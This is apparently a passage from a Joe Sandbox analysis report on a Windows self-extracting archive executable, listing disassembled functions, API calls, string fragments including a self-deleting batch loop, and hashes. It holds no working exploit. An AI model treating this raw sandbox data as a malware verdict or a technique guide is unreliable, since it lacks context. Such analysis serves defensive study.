                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                • API String ID: 408529070-24824748
                                                                                                                                                                                                                                                • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                                                                                                                                                                                                • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                                                                                                                                                                                                                Function 00401F9D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 150stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00401FFD
                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00402017
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040204C
                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 0040212A
                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                • String ID: 7zSfxString%d$XpA$\3A
                                                                                                                                                                                                                                                • API String ID: 2117570002-3108448011
                                                                                                                                                                                                                                                • Opcode ID: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                                                                                                                                                                                                                                                • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                                                                                                                                                                                                                                Function 00401BDF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                                                                                                                                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                                                                                                                                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00401C95
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                                                                                                                                                                                • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                                                                                                                                                                                • API String ID: 2639302590-365843014
                                                                                                                                                                                                                                                • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                                                                                                                                                                                • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                                                                                                                                                                                                                Function 00407776 Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 829399097-0
                                                                                                                                                                                                                                                • Opcode ID: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
                                                                                                                                                                                                                                                • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                                                                                                                                                                                                                                Function 00402B79 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1862581289-0
                                                                                                                                                                                                                                                • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                                                                                                                                                                                                • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                                                                                                                                                                                                                                Function 00406D5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                                                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00406D8F
                                                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$AddressLibraryLoadProc
                                                                                                                                                                                                                                                • String ID: SetWindowTheme$\EA$uxtheme
                                                                                                                                                                                                                                                • API String ID: 324724604-1613512829
                                                                                                                                                                                                                                                • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                                                                                                                                                                                                • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                                                                                                                                                                                                                Function 0041022D Relevance: .5, Instructions: 501COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                                                                                                                                                                                • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                                                                                                                                                                                                                                Function 0041206B Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                                                                                                                                                                                • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                                                                                                                                                                                                                                Function 00411F91 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                                                                                                                                                                • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                                                                                                                                                                                                                Function 0040D72E Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                                                                                                                                                                                • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                                                                                                                                                                                                                                Function 00404AFF Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                                                                                                                                                                                • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                                                                                                                                                                                • API String ID: 3007203151-3467708659
                                                                                                                                                                                                                                                • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                                                                                                                                                                                                • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                                                                                                                                                                                                                Function 00404603 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 207stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
